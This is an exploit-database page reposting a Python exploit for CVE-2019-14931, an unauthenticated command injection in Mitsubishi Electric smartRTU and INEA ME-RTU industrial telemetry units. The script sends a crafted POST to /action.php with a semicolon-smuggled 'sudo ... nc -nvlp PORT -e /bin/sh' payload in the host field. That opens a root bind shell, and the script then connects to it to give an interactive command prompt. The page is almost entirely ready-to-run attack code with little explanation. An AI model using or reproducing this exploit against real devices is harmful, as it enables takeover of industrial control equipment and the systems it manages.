Advertisement






Mitsubishi Electric smartRTU / INEA ME-RTU Unauthenticated OS Command Injection Bind Shell

CVE Category Price Severity
CVE-2019-14931 CWE-78 $5,000 Critical
Author Risk Exploitation Type Date
Unknown Critical Remote 2019-08-14
CVSS EPSS EPSSP
CVSS:4.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019080056

Below is a copy:

Mitsubishi Electric smartRTU / INEA ME-RTU Unauthenticated OS Command Injection Bind Shell
#!/usr/bin/python

# Exploit Title: Mitsubishi Electric smartRTU & INEA ME-RTU Unauthenticated OS Command Injection
# Date: 29 June 2019 
# Exploit Author: (@xerubus | mogozobo.com)
# Vendor Homepage: https://eu3a.mitsubishielectric.com/fa/en/products/cnt/plcccl/items/smartRTU/local
# Vendor Homepage: http://www.inea.si/en/telemetrija-in-m2m-produkti/mertu-en/
# Firmware Version: Misubishi Electric 2.02 & INEA 3.0 
# CVE-ID: CVE-2019-14931
# Full write-up: https://www.mogozobo.com/?p=3593

import sys, os, requests, socket

os.system('clear')

print("""\
        _  _
  ___ (~ )( ~)
 /   \_\ \/ /   
|   D_ ]\ \/  -= Bind_Me-smartRTU  by @xerubus =-    
|   D _]/\ \  -= We all have something to hide =-
 \___/ / /\ \\
      (_ )( _)
      @Xerubus    
                    """)

host = raw_input("Enter RTU IP address: ")
port = raw_input("Enter bind shell port number: ")

php_page = '/action.php'
url = "http://{}{}".format(host, php_page)
payload = {'host' : ';sudo /usr/sbin/service ../../bin/nc -nvlp '+port+' -e /bin/sh&PingCheck=Test'}

print "\n[+] Building payload"
print "[+] Sending payload"
print "[+] Attempting connection to smartRTU"

try:
   r = requests.post(url, data=payload, timeout=1)
except:
   pass

port = (int(port))

try:
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   s.connect((host, port))

   try :  
      print "[+] Connected to the smartRTU!\n"
      while 1:  
         cmd = raw_input("(smartRTU-shell) # ");  
         s.send(cmd + "\n");  
         result = s.recv(1024).strip();  
         if not len(result) :  
            print "\n[!] Play nice now skiddies....\n\n"
            s.close();  
            break;  
         print(result);  

   except KeyboardInterrupt:
      print "\n[+] ^C Received, closing connection"
      s.close();
   except EOFError:
      print "\n[+] ^D Received, closing connection"
      s.close();

except socket.error:
   print "[!] Failed to connect to bind shell."

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.